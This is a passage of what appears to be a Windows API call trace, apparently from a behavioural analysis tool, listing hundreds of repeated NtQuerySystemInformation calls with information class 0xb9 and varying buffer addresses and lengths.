Length=0x0, ResultLength=0x0) [0207.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x28, ResultLength=0x0) [0207.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0207.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0207.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x20, ResultLength=0x0) [0207.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0207.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0207.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0207.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x20, ResultLength=0x0) [0207.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0207.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x20, ResultLength=0x0) [0207.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0207.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0207.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0207.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0207.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x20, ResultLength=0x0) [0207.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0207.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0207.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0207.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0207.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x20, ResultLength=0x0) [0207.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0207.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0207.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1d8, Length=0x58, ResultLength=0x0) [0207.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0a0, Length=0x58, ResultLength=0x0) [0207.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0207.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0207.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0207.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0207.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0207.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce60, Length=0x28, ResultLength=0x0) [0207.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0207.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0207.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0207.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0207.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce40, Length=0x20, ResultLength=0x0) [0207.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x20, ResultLength=0x0) [0207.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x20, ResultLength=0x0) [0207.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x20, ResultLength=0x0) [0207.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0207.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce40, Length=0x20, ResultLength=0x0) [0207.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0207.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0207.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0a0, Length=0x58, ResultLength=0x0) [0207.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0207.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0207.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0207.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0207.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0207.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce60, Length=0x28, ResultLength=0x0) [0207.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0207.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0207.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0207.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd80, Length=0x20, ResultLength=0x0) [0207.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd00, Length=0x20, ResultLength=0x0) [0207.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd00, Length=0x20, ResultLength=0x0) [0207.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd00, Length=0x20, ResultLength=0x0) [0207.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0207.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0207.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce40, Length=0x20, ResultLength=0x0) [0207.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0207.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0207.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0a0, Length=0x58, ResultLength=0x0) [0207.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0207.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0207.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0207.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0207.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0207.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce60, Length=0x28, ResultLength=0x0) [0207.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0207.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0207.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0207.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0207.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce40, Length=0x20, ResultLength=0x0) [0207.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x20, ResultLength=0x0) [0207.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x20, ResultLength=0x0) [0207.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x20, ResultLength=0x0) [0207.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0207.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce40, Length=0x20, ResultLength=0x0) [0207.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0207.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0207.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0a0, Length=0x58, ResultLength=0x0) [0207.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x38, ResultLength=0x0) [0207.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0207.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0207.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0207.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0207.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce30, Length=0x28, ResultLength=0x0) [0207.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.168] NtQuerySystemInformation 